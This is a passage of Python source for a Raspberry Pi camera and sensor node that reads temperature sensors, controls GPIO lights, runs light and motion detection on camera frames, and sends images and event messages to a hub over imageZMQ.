def setup_sensors(self, settings):
""" Create a list of sensors from the sensors section of the yaml file
Typical sensors include temperature and humidity, but PIR motion
detectors, light meters and other are possible
Parameters:
settings (Settings object): settings object created from YAML file
"""
for sensor in settings.sensors: # for each sensor listed in yaml file
s = Sensor(sensor, settings.sensors, settings, self.tiny_image,
self.send_q)
self.sensors.append(s) # add it to the list of sensors
def setup_lights(self, settings):
""" Create a list of lights from the lights section of the yaml file
Lights are controlled by the RPI GPIO pins. The light settings name
each light and assign it a GPIO pin
Parameters:
settings (Settings object): settings object created from YAML file
"""
for light in settings.lights: # for each light listed in yaml file
lst = Light(light, settings.lights, settings) # create a Light instance with settings
self.lights.append(lst) # add it to the list of lights
def setup_cameras(self, settings):
""" Create a list of cameras from the cameras section of the yaml file
Often, the list will contain a single PiCamera, but it could be a
PiCamera with one or more webcams. Or one or more webcams with no
PiCamera.
Parameters:
settings (Settings object): settings object created from YAML file
"""
for camera in settings.cameras: # for each camera listed in yaml file
cam = Camera(camera, settings.cameras, settings) # create a Camera instance
self.camlist.append(cam) # add it to the list of cameras
def REP_watcher(self):
""" checks that a REP was received after a REQ; fix_comm_link() if not
When running in production, watching for a stalled ZMQ channel is required.
The REP_watcher yaml option enables checking that REP is received after REQ.
Runs in a thread; both REQ_sent_time & REP_recd_time are deque(maxlen=1).
Although REPs and REQs can be filling the deques continuously in the main
thread, we only need to occasionally check recent REQ / REP times. When
we have not received a timely REP after a REQ, we have a broken ZMQ
communications channel and call self.fix_comm_link().
"""
while True:
sleep(self.patience) # how often to check
try:
recent_REQ_sent_time = self.REQ_sent_time.popleft()
# if we got here; we have a recent_REQ_sent_time
sleep(1.0) # allow time for receipt of a REP
try:
recent_REP_recd_time = self.REP_recd_time.popleft()
except IndexError: # there was a REQ, but no REP was received
self.fix_comm_link()
# if we got here; we have a recent_REP_recd_time
interval = recent_REP_recd_time - recent_REQ_sent_time
if interval.total_seconds() <= 0.0:
# recent_REP_recd_time is not later than recent_REQ_sent_time
self.fix_comm_link()
except IndexError: # there wasn't a time in REQ_sent_time
# so there is no REP expected,
# ... so continue to loop until there is a time in REQ_sent_time
pass
def send_jpg_frame(self, text, image):
""" Compresses image as jpg before sending
Function self.send_frame() is set to this function if jpg option chosen
"""
ret_code, jpg_buffer = cv2.imencode(".jpg", image,
[int(cv2.IMWRITE_JPEG_QUALITY),
self.jpeg_quality])
hub_reply = self.sender.send_jpg(text, jpg_buffer)
return hub_reply
def send_image_frame(self, text, image):
""" Sends image as unchanged OpenCV image; no compression
Function self.send_frame() is set to this function if image option chosen
"""
hub_reply = self.sender.send_image(text, image)
return hub_reply
def send_jpg_frame_REP_watcher(self, text, image):
""" Compresses image as jpg before sending; sends with RPI_watcher deques
Function self.send_frame() is set to this function if jpg option chosen
and if REP_watcher option is True. For each (text, jpg_buffer) that is
sent, the current time is appended to a deque before and after the send.
This allows comparing times to check if a REP has been received after
the (text, jpg_buffer) REQ has been sent. See self.REP_watcher() method
for details.
"""
ret_code, jpg_buffer = cv2.imencode(
".jpg", image, [int(cv2.IMWRITE_JPEG_QUALITY),
self.jpeg_quality])
self.REQ_sent_time.append(datetime.utcnow()) # utcnow 2x faster than now
try:
hub_reply = self.sender.send_jpg(text, jpg_buffer)
except: # add more specific exception, e.g. ZMQError, after testing
print("Exception at sender.send_jpg in REP_watcher function.")
self.fix_comm_link()
self.REP_recd_time.append(datetime.utcnow())
return hub_reply
def send_image_frame_REP_watcher(self, text, image):
""" Sends uncompressed OpenCV image; sends with RPI_watcher deques
Function self.send_frame() is set to this function if image option chosen
and if REP_watcher option is True. For each (text, image) that is
sent, the current time is appended to a deque before and after the send.
This allows comparing times to check if a REP has been received after
the (text, image) REQ has been sent. See self.REP_watcher() method
for details.
"""
self.REQ_sent_time.append(datetime.utcnow()) # utcnow 2x faster than now
try:
hub_reply = self.sender.send_image(text, image)
except: # add more specific exception, e.g. ZMQError, after testing
print("Exception at sender.send_image in REP_watcher function.")
self.fix_comm_link()
self.REP_recd_time.append(datetime.utcnow())
return hub_reply
def read_cameras(self):
""" Read one image from each camera and run detectors.
Perform vflip and image resizing if requested in YAML settings file.
Append transformed image to cam_q queue.
"""
for camera in self.camlist:
image = camera.cam.read()
if camera.vflip:
image = cv2.flip(image, -1)
if camera.resize_width:
image = imutils.resize(image, width=camera.width_pixels)
camera.cam_q.append(image)
for detector in camera.detectors:
self.run_detector(camera, image, detector)
def run_detector(self, camera, image, detector):
""" run detector on newest image and detector queue; perform detection
For each detector, add most recently acquired image to detector queue.
Apply detector criteria to detector queue of images to evaluate events.
Append messages about events detected, if any, to send_q queue. Also,
append any images relevant to a detected event to send_q queue.
Parameters:
camera (Camera object): current camera
image (openCV image): most recently acquired camera image
detector (Detector object): current detector to apply to image
queue (e.g. motion)
"""
if detector.draw_roi:
cv2.rectangle(image,
detector.top_left,
detector.bottom_right,
detector.draw_color,
detector.draw_line_width)
# For troubleshooting purposes - print time on images
if detector.draw_time:
display_time = datetime.now().isoformat(sep=' ', timespec='microseconds')
cv2.putText(image,
display_time,
detector.draw_time_org,
cv2.FONT_HERSHEY_SIMPLEX,
detector.draw_time_fontScale,
detector.draw_time_color,
detector.draw_time_width,
cv2.LINE_AA)
# detect state (light, etc.) and put images and events into send_q
detector.detect_state(camera, image, self.send_q)
def fix_comm_link(self):
""" Evaluate, repair and restart communications link with hub.
Perhaps in future: Close and restart imageZMQ if possible, else restart
program or reboot computer.
For now, just call a function that will cause imagenode.py to exit.
"""
self.shutdown_imagenode()
sys.exit()
def shutdown_imagenode(self):
""" Start a process that shuts down the imagenode.py program.
It is very difficult to shutdown the imagenode.py program from
within a thread since sys.exit() only exits the thread. And most other
techniques that will end a program immediately don't close resources
appropriately. But creating a subprocess that kills the imagenode.py
parent process works cleanly. There really should be an easier way to
end a Python program from a thread, but after lots of searching, this
works. And, yes, it is messy. Please find a better one and send a
pull request!
"""
multiprocessing.Process(daemon=True,
args=(self.pid,),
target=self.shutdown_process_by_pid).start()
sys.exit()
def shutdown_process_by_pid(self, pid):
os.kill(pid, signal.SIGTERM)
sys.exit()
def process_hub_reply(self, hub_reply):
""" Process hub reply if it is other than "OK".
A hub reply is normally "OK", but could be "send 10 images" or
"set resolution: (320, 240)". This method processes hub requests.
This may involve sending a requested image sequence, changing a setting,
or restarting the computer.
"""
# Typical response from hub is "OK" if there are no user or
# automated librarian requests. Almost all responses are just "OK"
# therefore the default process_hub_reply is "pass"
# TODO Respond to hub replies if they are other than 'OK'
# for example, push "send 10 frames" request onto deque
# and then add "do requested extra frames" to detectors loop
# so that images get sent even though there is no routine reason
pass
def closeall(self, settings):
""" Close all resources, including cameras, lights, GPIO.
Parameters:
settings (Settings object): settings object created from YAML file
"""
for camera in self.camlist:
camera.cam.stop()
for light in self.lights:
light.turn_off()
if settings.sensors or settings.lights:
GPIO.cleanup()
if self.health.stall_p:
self.health.stall_p.terminate()
self.health.stall_p.join()
if settings.send_threading:
self.send_q.stop_sending()
self.sender.zmq_socket.setsockopt(zmq.LINGER, 0) # prevents ZMQ hang on exit
self.sender.close()
class SendQueue:
""" Implements a send_q replacement that uses threaded sends
The default send_q is a deque that is filled in a read_cameras forever loop
in the imagenode.py main() event loop. When the default send_q tests True
because it contains images to send, the send_frame loop empties the send_q.
It works, but has speed issues when sending occurs while motion detection is
actively occurring at the same time.
This class creates a drop-in replacement for send_q. This replacement
send_q will always return len(send_q) as 0 as if empty, so that the main()
event loop will loop forever in node.read_cameras() without ever sending
anything. This is implemented by providing __bool__ and __len__ methods to
prevent read_cameras from ever reaching the send_frame portion of the main
imagenode.py event loop.
This send_q replacement append() method will operate in read_cameras just as
the deque did, but has a send_messages_forever method in a separate
thread to send (message, image) tuples to empty the send_q. This
implementation of send_q allows the imagenode.py main program to remain
unchanged when send_threading is not set to True in the yaml settings.
Parameters:
maxlen (int): maximum length of send_q deque
send_frame (func): the ImageNode method that sends frames
process_hub_reply (func): the ImageNode method that processes hub replies
"""
def __init__(self, maxlen=500, send_frame=None, process_hub_reply=None):
self.send_q = deque(maxlen=maxlen)
self.send_frame = send_frame
self.process_hub_reply = process_hub_reply
self.keep_sending = True
def __bool__(self):
return False # so that the read loop keeps reading forever
def __len__(self):
return 0 # so that the main() send loop is never entered
def append(self, text_and_image):
self.send_q.append(text_and_image)
def send_messages_forever(self):
# this will run in a separate thread
# the "sleep()" calls allow main thread more time for image capture
while self.keep_sending:
if len(self.send_q) > 0: # send until send_q is empty
text, image = self.send_q.popleft()
sleep(0.0000001) # sleep before sending
hub_reply = self.send_frame(text, image)
self.process_hub_reply(hub_reply)
else:
sleep(0.0000001) # sleep before checking send_q again
def start(self):
# start the thread to read frames from the video stream
t = threading.Thread(target=self.send_messages_forever)
t.daemon = True
t.start()
def stop_sending(self):
self.keep_sending = False
sleep(0.0000001) # sleep to allow ZMQ to clear buffer
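# Usage sketch (variable names here are illustrative, not part of the module):
# ImageNode.__init__() above swaps this class in for the plain deque when the
# YAML option send_threading is True, e.g.
#   send_q = SendQueue(maxlen=settings.queuemax,
#                      send_frame=node.send_frame,
#                      process_hub_reply=node.process_hub_reply)
#   send_q.start()
# read_cameras() keeps calling send_q.append(...) exactly as before while the
# background thread drains the queue; call send_q.stop_sending() at shutdown.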
class Sensor:
""" Methods and attributes of a sensor, such as a temperature sensor
Each sensor is setup and started using the settings in the yaml file.
Includes methods for reading, and closing the sensor and GPIO pins.
Parameters:
sensor (text): dictionary key of current sensor being instantiated
sensors (dict): dictionary of all the sensors in the YAML file
settings (Settings object): settings object created from YAML file
"""
def __init__(self, sensor, sensors, settings, tiny_image, send_q):
""" Initializes a specific sensor using settings in the YAML file.
"""
self.tiny_image = tiny_image
self.send_q = send_q
if 'name' in sensors[sensor]:
self.name = sensors[sensor]['name']
else:
self.name = sensor
if 'gpio' in sensors[sensor]:
self.gpio = sensors[sensor]['gpio']
else:
self.gpio = 4 # GPIO pin 4 is default for testing
if 'type' in sensors[sensor]:
self.type = sensors[sensor]['type']
else:
self.type = 'Unknown'
if 'unit' in sensors[sensor]:
self.unit = sensors[sensor]['unit'].upper()
else:
self.unit = 'F'
if 'read_interval_minutes' in sensors[sensor]:
self.interval = sensors[sensor]['read_interval_minutes']
else:
self.interval = 10 # how often to read sensor in minutes
if 'min_difference' in sensors[sensor]:
self.min_difference = sensors[sensor]['min_difference']
else:
self.min_difference = 1 # minimum difference to count as reportable
self.interval *= 60.0 # convert read interval from minutes to seconds
# self.event_text is the text message for this sensor that is
# sent when the sensor value changes
# example: Barn|Temperature|85 F
# example: Barn|Humidity|42 %
# example: Garage|Temperature|71 F
# example: Compost|Moisture|95 %
# self.event_text will have self.current_reading appended when events are sent
# self.event_text = '|'.join([settings.nodename, self.name]).strip()
self.event_text = settings.nodename
# Initialize last_reading and temp_sensor variables
self.last_reading_temp = -999 # will ensure first temp reading is a change
self.last_reading_humidity = -999 # will ensure first humidity reading is a change
self.temp_sensor = None
# Sensor types
if self.type == 'DS18B20':
# note that DS18B20 requires GPIO pin 4 (unless kernel is modified)
global W1ThermSensor # for DS18B20 temperature sensor
from w1thermsensor import W1ThermSensor
self.temp_sensor = W1ThermSensor()
if (self.type == 'DHT11') or (self.type == 'DHT22'):
global adafruit_dht # for DHT11 & DHT22 temperature sensor
import adafruit_dht
if self.type == 'DHT11':
self.temp_sensor = adafruit_dht.DHT11(self.gpio)
if self.type == 'DHT22':
self.temp_sensor = adafruit_dht.DHT22(self.gpio)
if self.temp_sensor is not None:
self.check_temperature() # check one time, then start interval_timer
threading.Thread(daemon=True,
target=lambda: interval_timer(self.interval, self.check_temperature)).start()
def check_temperature(self):
""" adds temperature & humidity (if available) value from a sensor to senq_q message queue
"""
if self.type == 'DS18B20':
if self.unit == 'C':
temperature = int(self.temp_sensor.get_temperature(W1ThermSensor.DEGREES_C))
else:
temperature = int(self.temp_sensor.get_temperature(W1ThermSensor.DEGREES_F))
humidity = -999
if (self.type == 'DHT11') or (self.type == 'DHT22'):
for i in range(5): # try for valid readings 5 times; break if valid
try:
if self.unit == 'C':
temperature = self.temp_sensor.temperature
else:
temperature = self.temp_sensor.temperature * (9 / 5) + 32
temperature = float(format(temperature, '.1f'))
humidity = self.temp_sensor.humidity
humidity = float(format(humidity, '.1f'))
break # break out of for loop if got valid readings
except RuntimeError:
sleep(3) # wait 3 seconds and try again
pass # this will retry up to 5 times before exiting the for loop
if abs(temperature - self.last_reading_temp) >= self.min_difference:
# temperature has changed from last reported temperature, therefore
# send an event message reporting temperature by appending to send_q
temp_text = str(temperature) + " " + self.unit
text = '|'.join([self.event_text, 'Temp', temp_text])
text_and_image = (text, self.tiny_image)
self.send_q.append(text_and_image)
self.last_reading_temp = temperature
if abs(humidity - self.last_reading_humidity) >= self.min_difference:
# humidity has changed from last reported humidity, therefore
# send an event message reporting humidity by appending to send_q
humidity_text = str(humidity) + " %"
# Spelling of humidity all lower case is intentional to avoid
# first letter test of "Heartbeat" in imagehub
text = '|'.join([self.event_text, 'humidity', humidity_text])
text_and_image = (text, self.tiny_image)
self.send_q.append(text_and_image)
self.last_reading_humidity = humidity
class Light:
""" Methods and attributes of a light controlled by an RPi GPIO pin
Each light is setup and started using the settings in the yaml file.
Includes methods for turning the light on and off using the GPIO pins.
Parameters:
light (text): dictionary key of the current light being instantiated
lights (dict): dictionary of all the lights in the YAML file
settings (Settings object): settings object created from YAML file
"""
def __init__(self, light, lights, settings):
""" Initializes a specific light using settings in the YAML file.
"""
if 'name' in lights[light]:
self.name = lights[light]['name']
else:
self.name = light
if 'gpio' in lights[light]:
self.gpio = lights[light]['gpio']
else:
self.gpio = 18 # GPIO pin 18 is the default for testing
if 'on' in lights[light]:
self.on = lights[light]['on']
else:
self.on = 'continuous'
GPIO.setup(self.gpio, GPIO.OUT)
if self.on == 'continuous':
self.turn_on()
else: # set up light on/off cycling other than continuous
pass # for example, during certain hours
def turn_on(self):
""" Turns on the light using the GPIO pins
"""
GPIO.output(self.gpio, True) # turn on light
def turn_off(self):
""" Turns off the light using the GPIO pins
"""
GPIO.output(self.gpio, False) # turn off light
class PiCameraUnthreadedStream():
""" Rreads the PiCamera without threading.
The PiVideoStream class within imutils.VideoStream provides a threaded way
to read the PiCamera images. This class provides a way to read the PiCamera
without threading, primarily intended for testing. For compatibility, the
method names are the same as imutils.VideoStream.
"""
def __init__(self, resolution=(320, 240), framerate=32, **kwargs):
from picamera.array import PiRGBArray
from picamera import PiCamera
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr",
use_video_port=True)
self.frame = None
def read(self):
f = next(self.stream) # or f = self.stream.read()?
self.frame = f.array
self.rawCapture.truncate(0)
return self.frame
def stop(self):
self.close()
def close(self):
self.stream.close()
self.rawCapture.close()
self.camera.close()
class Camera:
""" Methods and attributes of a camera
Each camera is setup and started using the settings in the yaml file.
Includes setup of detectors, e.g., detector for motion
Parameters:
camera (text): dict key of current camera being instantiated
cameras (dict): dictionary of all cameras named in YAML file
settings (Settings object): settings object created from YAML file
"""
def __init__(self, camera, cameras, settings):
""" Initializes all the camera settings from settings in the YAML file.
"""
self.cam = None
self.jpeg_quality = 95 # 0 to 100, higher is better quality, 95 is cv2 default
# check picamera version
try:
picamversion = require('picamera')[0].version
except:
picamversion = '0'
if 'threaded_read' in cameras[camera]: # threaded or non-threaded camera reading
self.threaded_read = cameras[camera]['threaded_read']
else:
self.threaded_read = True
if 'resolution' in cameras[camera]:
self.resolution = literal_eval(cameras[camera]['resolution'])
else:
self.resolution = (320, 240)
if 'framerate' in cameras[camera]:
self.framerate = cameras[camera]['framerate']
else:
self.framerate = 32
if 'vflip' in cameras[camera]:
self.vflip = cameras[camera]['vflip']
else:
self.vflip = False
if 'resize_width' in cameras[camera]:
# resize_width is a percentage value
# width in pixels will be computed later after reading a test image
self.resize_width = cameras[camera]['resize_width']
else:
self.resize_width = None
if 'viewname' in cameras[camera]:
self.viewname = cameras[camera]['viewname']
else:
self.viewname = ' '
if 'src' in cameras[camera]:
self.src = cameras[camera]['src']
else:
self.src = 0
if 'exposure_mode' in cameras[camera]:
self.exposure_mode = cameras[camera]['exposure_mode']
else:
self.exposure_mode = None
if 'iso' in cameras[camera]:
self.iso = cameras[camera]['iso']
else:
self.iso = 0 # default value
if 'shutter_speed' in cameras[camera]:
self.shutter_speed = cameras[camera]['shutter_speed']
else:
self.shutter_speed = 0 # default value
if 'sharpness' in cameras[camera]:
self.sharpness = cameras[camera]['sharpness']
else:
self.sharpness = 0 # default value
if 'contrast' in cameras[camera]:
self.contrast = cameras[camera]['contrast']
else:
self.contrast = 0 # default value
if 'brightness' in cameras[camera]:
self.brightness = cameras[camera]['brightness']
else:
self.brightness = 50 # default value
if 'exposure_compensation' in cameras[camera]:
self.exposure_compensation = cameras[camera]['exposure_compensation']
else:
self.exposure_compensation = 0 # 0 default value, integer value between -25 and 25
if 'awb_mode' in cameras[camera]:
self.awb_mode = cameras[camera]['awb_mode']
else:
self.awb_mode = 'auto' # default value
self.detectors = []
if 'detectors' in cameras[camera]: # is there at least one detector
self.setup_detectors(cameras[camera]['detectors'],
settings.nodename,
self.viewname)
if camera[0].lower() == 'p': # this is a picam
# start PiCamera and warm up; inherits methods from
# imutils.VideoStream unless threaded_read is False; then uses class
# PiCameraUnthreadedStream to read the PiCamera in an unthreaded way
if self.threaded_read:
self.cam = VideoStream(usePiCamera=True,
resolution=self.resolution,
framerate=self.framerate).start()
else:
self.cam = PiCameraUnthreadedStream(resolution=self.resolution,
framerate=self.framerate)
# if an exposure mode has been set in yaml, set it
if self.exposure_mode:
self.cam.camera.exposure_mode = self.exposure_mode
# if an iso has been set in yaml, set it
if self.iso:
self.cam.camera.iso = self.iso
# if a shutter_speed has been set in yaml, set it
if self.shutter_speed:
self.cam.camera.shutter_speed = self.shutter_speed
# if a sharpness has been set in yaml, set it
if self.sharpness:
self.cam.camera.sharpness = self.sharpness
# if a contrast has been set in yaml, set it
if self.contrast:
self.cam.camera.contrast = self.contrast
# if a brightness has been set in yaml, set it
if self.brightness:
self.cam.camera.brightness = self.brightness
# if an exposure_compensation has been set in yaml, set it
if self.exposure_compensation:
self.cam.camera.exposure_compensation = self.exposure_compensation
# if an awb_mode has been set in yaml, set it
if self.awb_mode:
self.cam.camera.awb_mode = self.awb_mode
self.cam_type = 'PiCamera'
else: # this is a webcam (not a picam)
self.cam = VideoStream(src=self.src).start()
self.cam_type = 'webcam'
sleep(3.0) # allow camera sensor to warm up
# self.text is the text label for images from this camera.
# Each image that is sent is sent with a text label so the hub can
# file them by nodename, viewname, and send_type
# example: JeffOffice Window|jpg
# Nodename and View name are in one field, separated by a space.
# send_type is in the next field
# The 2 field names are separated by the | character
node_and_view = ' '.join([settings.nodename, self.viewname]).strip()
self.text = '|'.join([node_and_view, settings.send_type])
# set up camera image queue
self.cam_q = deque(maxlen=settings.queuemax)
def setup_detectors(self, detectors, nodename, viewname):
""" Create a list of detectors for this camera
Parameters:
detectors (dict): detectors for this camera from YAML file
nodename (str): nodename to identify event messages and images sent
viewname (str): viewname to identify event messages and images sent
"""
if isinstance(detectors, list):
for lst in detectors:
for detector in lst:
det = Detector(detector, lst, nodename, viewname) # create a Detector instance
self.detectors.append(det) # add to list of detectors for this camera
else:
for detector in detectors: # for each detector listed in yaml file
det = Detector(detector, detectors, nodename, viewname) # create a Detector instance
self.detectors.append(det) # add to list of detectors for this camera
class Detector:
""" Methods and attributes of a detector for motion, light, etc.
Each detector is setup with ROI tuples and various parameters.
Detector options that are common to all detectors are set up here.
Detector options that are specific to individual detector types (like
'light') are set up in detector-specific sections here.
Parameters:
detector (text): dict key for a specific detector for this camera
detectors (dict): dictionary of all detectors for this camera
nodename (str): nodename to identify event messages and images sent
viewname (str): viewname to identify event messages and images sent
"""
def __init__(self, detector, detectors, nodename, viewname):
""" Initializes all the detector using settings from the YAML file.
"""
self.detector_type = detector
# set detect_state function to detector_type (e.g., light or motion)
if detector == 'light':
self.detect_state = self.detect_light
if 'threshold' in detectors[detector]:
self.threshold = detectors[detector]['threshold']
else:
self.threshold = 100 # 100 is a default for testing
if 'min_frames' in detectors[detector]:
self.min_frames = detectors[detector]['min_frames']
else:
self.min_frames = 5 # 5 is default
# need to remember min_frames of state history to calculate state
self.state_history_q = deque(maxlen=self.min_frames)
elif detector == 'motion':
self.detect_state = self.detect_motion
self.moving_frames = 0
self.still_frames = 0
self.total_frames = 0
if 'delta_threshold' in detectors[detector]:
self.delta_threshold = detectors[detector]['delta_threshold']
else:
self.delta_threshold = 5 # 5 is a default for testing
if 'min_area' in detectors[detector]:
self.min_area = detectors[detector]['min_area']
else:
self.min_area = 3 # 3 is default percent of ROI
if 'min_motion_frames' in detectors[detector]:
self.min_motion_frames = detectors[detector]['min_motion_frames']
else:
self.min_motion_frames = 3 # 3 is default
if 'min_still_frames' in detectors[detector]:
self.min_still_frames = detectors[detector]['min_still_frames']
else:
self.min_still_frames = 3 # 3 is default
self.min_frames = max(self.min_motion_frames, self.min_still_frames)
if 'blur_kernel_size' in detectors[detector]:
self.blur_kernel_size = detectors[detector]['blur_kernel_size']
else:
self.blur_kernel_size = 15 # 15 is default blur_kernel_size
if 'print_still_frames' in detectors[detector]:
self.print_still_frames = detectors[detector]['print_still_frames']
else:
self.print_still_frames = True # True is default print_still_frames
if 'ROI' in detectors[detector]:
self.roi_pct = literal_eval(detectors[detector]['ROI'])
else:
self.roi_pct = ((0, 0), (100, 100))
if 'draw_roi' in detectors[detector]:
self.draw_roi = literal_eval(detectors[detector]['draw_roi'])
self.draw_color = self.draw_roi[0]
self.draw_line_width = self.draw_roi[1]
else:
self.draw_roi = None
# name of the ROI detector section
if 'roi_name' in detectors[detector]:
self.roi_name = detectors[detector]['roi_name']
else:
self.roi_name = ''
# include ROI name in log events
if 'log_roi_name' in detectors[detector]:
self.log_roi_name = detectors[detector]['log_roi_name']
else:
self.log_roi_name = False
# draw timestamp on image
if 'draw_time' in detectors[detector]:
self.draw_time = literal_eval(detectors[detector]['draw_time'])
self.draw_time_color = self.draw_time[0]
self.draw_time_width = self.draw_time[1]
if 'draw_time_org' in detectors[detector]:
self.draw_time_org = literal_eval(detectors[detector]['draw_time_org'])
else:
self.draw_time_org = (0, 0)
if 'draw_time_fontScale' in detectors[detector]:
self.draw_time_fontScale = detectors[detector]['draw_time_fontScale']
else:
self.draw_time_fontScale = 1
else:
self.draw_time = None
send_frames = 'None Set'
self.frame_count = 0
# send_frames option can be 'continuous', 'detected event', 'none'
if 'send_frames' in detectors[detector]:
send_frames = detectors[detector]['send_frames']
if not send_frames: # None was specified; send 0 frames
self.frame_count = 0
elif 'detect' in send_frames:
self.frame_count = 10 # detected events default; adjusted later
elif 'continuous' in send_frames:
self.frame_count = -1 # send continuous flag
elif 'none' in send_frames: # don't send any frames
self.frame_count = 0
else:
self.frame_count = -1 # send continuous flag
# send_count option is an integer of how many frames to send if event
if 'send_count' in detectors[detector]:
self.send_count = detectors[detector]['send_count']
else:
self.send_count = 5 # default number of frames to send per event
# send_test_images option: if True, send test images like ROI, Gray
if 'send_test_images' in detectors[detector]:
self.send_test_images = detectors[detector]['send_test_images']
else:
self.send_test_images = False # default is NOT to send test images
# self.event_text is the text message for this detector that is
# sent when the detector state changes
# example: JeffOffice Window|light|dark
# example: JeffOffice Window|light|lighted
# self.event_text will have self.current_state appended when events are sent
node_and_view = ' '.join([nodename, viewname]).strip()
self.event_text = '|'.join([node_and_view, self.detector_type])
# An event is a change of state (e.g., 'dark' to 'lighted')
# Every detector is instantiated with all states = 'unknown'
self.current_state = 'unknown'
self.last_state = 'unknown'
self.msg_image = np.zeros((2, 2), dtype="uint8") # blank image tiny
if self.send_test_images:
# set the blank image wide enough to hold message of send_test_images
self.msg_image = np.zeros((5, 320), dtype="uint8") # blank image wide
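# A rough sketch of one 'detectors' entry consumed by __init__ above; the
# keys are the ones looked up above, but the values are illustrative
# assumptions rather than recommended settings:
#
#   motion:
#     ROI: (10,20),(70,80)
#     draw_roi: ((255,0,0),1)
#     delta_threshold: 5
#     min_area: 3
#     min_motion_frames: 4
#     min_still_frames: 4
#     blur_kernel_size: 15
#     send_frames: detected event
#     send_count: 5
#     send_test_images: False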
def detect_state(self, camera, image, send_q):
""" Placeholder function will be set to specific detection function
For example, detect_state() will be set to detect_light() during
detector.__init__()
"""
print('Therefore, should never get to this print statement')
pass
def detect_light(self, camera, image, send_q):
""" Detect if ROI is 'lighted' or 'dark'; send event message and images
After adding current image to 'event state' history queue, detect if the
ROI state has changed (e.g., has state changed to 'lighted' from 'dark'.)
If the state has changed, send an event message and the event images.
(However, if send_frames option is 'continuous', images have already
been sent, so there is no need to send the event images.)
If state has not changed, just store the image state into 'event state'
history queue for later comparison and return.
Parameters:
camera (Camera object): current camera
image (OpenCV image): current image
send_q (Deque): where (text, image) tuples are appended to be sent
"""
# if we are sending images continuously, append current image to send_q
if self.frame_count == -1: # -1 code to send all frames continuously
text_and_image = (camera.text, image)
send_q.append(text_and_image)
# crop ROI & convert to grayscale
x1, y1 = self.top_left
x2, y2 = self.bottom_right
ROI = image[y1:y2, x1:x2]
gray = cv2.cvtColor(ROI, cv2.COLOR_BGR2GRAY)
# calculate current_state of ROI
gray_mean = int(np.mean(gray))
if gray_mean > self.threshold:
state = 'lighted'
state_num = 1
else:
state = 'dark'
state_num = -1
if self.send_test_images:
images = []
images.append(('ROI', ROI,))
images.append(('Grayscale', gray,))
state_values = []
state_values.append(('State', state,))
state_values.append(('Mean Pixel Value', str(gray_mean),))
self.send_test_data(images, state_values, send_q)
self.state_history_q.append(state_num)
if len(self.state_history_q) < self.min_frames:
return # not enough history to check for a state change
# have enough history now, so...
# determine if there has been a change in state
if self.state_history_q.count(-1) == self.min_frames:
self.current_state = 'dark'
elif self.state_history_q.count(1) == self.min_frames:
self.current_state = 'lighted'
else:
return # state has not stayed the same for self.min_frames
if self.current_state == self.last_state:
return # there has been no state change and hence no event yet
# state has changed from last reported state, therefore
# send event message, reporting current_state, by appending it to send_q
text = '|'.join([self.event_text, self.current_state])
if self.log_roi_name:
text = '|'.join([text, self.roi_name])
text_and_image = (text, self.msg_image)
send_q.append(text_and_image)
# if frame_count = -1, then already sending images continuously...
# so no need to send the images of this detected event
# if frame_count > 0, need to send send_count images from the cam_q
# by appending them to send_q
if self.frame_count > 0: # then need to send images of this event
send_count = min(len(camera.cam_q), self.send_count)
for i in range(-send_count, -1):
text_and_image = (camera.text, camera.cam_q[i])
send_q.append(text_and_image)
# Now that current state has been sent, it becomes the last_state
self.last_state = self.current_state
def detect_motion(self, camera, image, send_q):
""" Detect if ROI is 'moving' or 'still'; send event message and images
After adding current image to 'event state' history queue, detect if the
ROI state has changed (e.g., has state changed to 'moving' from 'still'.)
If the state has changed, send an event message and the event images.
(However, if send_frames option is 'continuous', images have already
been sent, so there is no need to send the event images.)
If state has not changed, just store the image into 'event state'
history queue for later comparison and return.
Parameters:
camera (Camera object): current camera
image (OpenCV image): current image
send_q (Deque): where (text, image) tuples are appended to be sent
This function borrowed a lot from a motion detector tutorial post by
<NAME> on PyImageSearch.com. See README.rst for details.
"""
#####
# Branch to fix duplicate frames; see GitHub issues #15 ()
#####
# if we are sending images continuously, append current image to send_q
if self.frame_count == -1: # -1 code ==> send all frames continuously
text_and_image = (camera.text, image)
send_q.append(text_and_image) # send current image
# crop ROI & convert to grayscale & apply GaussianBlur
x1, y1 = self.top_left
x2, y2 = self.bottom_right
ROI = image[y1:y2, x1:x2]
gray = cv2.cvtColor(ROI, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray,
(self.blur_kernel_size, self.blur_kernel_size),
0)
# If no history yet, save the first image as the average image
if self.total_frames < 1:
self.average = gray.copy().astype('float')
else:
# add gray image to weighted average image
cv2.accumulateWeighted(gray, self.average, 0.5)
# frame delta is the absolute difference between gray and self.average
frameDelta = cv2.absdiff(gray, cv2.convertScaleAbs(self.average))
# threshold the frame delta image and dilate the thresholded image
thresholded = cv2.threshold(frameDelta, self.delta_threshold,
255, cv2.THRESH_BINARY)[1]
thresholded = cv2.dilate(thresholded, None, iterations=2)
# find contours in thresholded image
# OpenCV version 3.x returns a 3 value tuple
# OpenCV version 4.x returns a 2 value tuple
contours_tuple = cv2.findContours(thresholded.copy(),
cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
contours = contours_tuple[-2] # captures contours value correctly for both versions of OpenCV
state = 'still'
area = 0
for contour in contours:
area = cv2.contourArea(contour)
if area < self.min_area_pixels:
continue
state = 'moving'
if state == 'moving':
self.moving_frames += 1
else:
self.moving_frames = 0
self.still_frames += 1
# Optionally, send various test images to visually tune settings
if self.send_test_images: # send some intermediate test images
images = []
images.append(('ROI', ROI,))
images.append(('Grayscale', gray,))
images.append(('frameDelta', frameDelta,))
images.append(('thresholded', thresholded,))
state_values = []
state_values.append(('State', self.current_state,))
state_values.append(('N Contours', str(len(contours)),))
state_values.append(('Area', str(area),))
self.send_test_data(images, state_values, send_q)
else:
sleep(0.02) # for testing
pass
self.total_frames += 1
if self.total_frames < self.min_frames:
return # not enough history to check for a state change
# have enough history now, so...
# determine if there has been a change in state
if self.moving_frames >= self.min_motion_frames:
self.current_state = 'moving'
self.still_frames = 0
elif self.still_frames >= self.min_still_frames:
self.current_state = 'still'
else:
return # not enough frames of either state; return for more
if self.current_state == self.last_state:
return # there has been no state change and hence no event yet
# state has changed from last reported state, so...
# send event message reporting current_state by appending it to send_q
text = '|'.join([self.event_text, self.current_state])
if self.log_roi_name:
text = '|'.join([text, self.roi_name])
text_and_image = (text, self.msg_image)
send_q.append(text_and_image)
